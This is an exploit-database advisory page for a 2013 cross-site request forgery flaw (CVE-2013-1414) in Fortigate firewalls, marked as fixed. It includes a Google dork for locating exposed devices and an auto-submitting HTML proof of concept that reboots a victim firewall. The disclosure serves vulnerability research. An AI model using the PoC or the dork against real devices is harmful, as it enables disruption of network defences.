Skip to content
cyberexploits
webapphardwaretext

Fortigate Firewalls - Cross-Site Request Forgery

Fortigate Firewalls - Cross-Site Request Forgery

Publié le 2013-07-01

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/26528.txt7eac4c3a
raw
Vulnerability ID: CVE-2013-1414

Vulnerability Type: CSRF (Cross-Site Request Forgery)

Product: All Fortigate Firewalls

Vendor: Fortinet http://www.fortinet.com

Vulnerable Version: < 4.3.13 &  < 5.0.2

 

Description

==========

Because many  functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.

 

Requirements

===========

An Attacker needs to know the IP of the device.

An Administrator needs an authenticated connection to the device.

 

 

Report-Timeline:

================

Vendor Notification: 11 July 2012

Vendor released version 5.0.2   / 18 March 2013

Vendor released version 4.3.13 / 29 April 2013

Status: Fixed

 

Google Dork:

==========

 -english -help -printing  -companies -archive  -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"

 

 

Credit:

=====

Sven Wurth     dos@net-war.de

 

 

PoC

====

 

This  Example will reboot a Fortinet Firewall.

This is just one of many possibilities to attack this vulnerability.

 

##### CSRF - Proof Of Concept ####

<html>

<body onload="submitForm()">

<form name="myForm" id="myForm"

                action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">

                <input type="hidden" name="reason" value="">

                <input type="hidden" name="action" value="1">

                <input type="submit" name="add" value="rebootme">

</form>

<script type='text/javascript'>document.myForm.submit();</script>

</html>

##### End Poc #####
Voir sur GitHub